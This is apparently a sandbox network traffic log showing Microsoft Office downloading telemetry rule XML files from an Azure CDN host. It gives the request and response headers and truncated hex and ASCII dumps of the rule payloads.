                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            97192.168.2.44970713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                            x-ms-request-id: bf27f234-e01e-003c-2019-36c70b000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120240Z-r178fb8d765tllwdhC1DFWaz8400000002g000000000cwd2
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            98192.168.2.44970813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                            x-ms-request-id: e1e5caf7-d01e-00ad-6fa7-34e942000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120240Z-r178fb8d7656shmjhC1DFWu5kw00000002eg00000000asvv
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            99192.168.2.44970913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                            x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120241Z-16547b76f7fwvr5dhC1DFW2c940000000khg0000000046hf
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            100192.168.2.44971013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                            x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120241Z-16547b76f7fr28cchC1DFWnuws0000000ks0000000005aab
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            101192.168.2.44971213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                            x-ms-request-id: d9801747-c01e-0049-456f-35ac27000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120241Z-1749fc9bdbd2c44rhC1DFWbxe000000002eg00000000abms
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            102192.168.2.44971113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                            x-ms-request-id: c37d6e00-a01e-001e-0178-3549ef000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120241Z-1749fc9bdbdjznvchC1DFWx4dc00000002cg000000005ff1
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            103192.168.2.44971313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                            x-ms-request-id: d4c521ce-601e-000d-6da3-342618000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120241Z-r178fb8d765w8fzdhC1DFW8ep400000002fg0000000043dr
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:41 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            104192.168.2.44971413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                            x-ms-request-id: 682504c0-001e-005a-75d2-2cc3d0000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120242Z-16547b76f7fljddfhC1DFWeqbs00000000fg000000007r1s
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            105192.168.2.44971513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                            x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120242Z-16547b76f7fr4g8xhC1DFW9cqc0000000hwg000000000un1
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
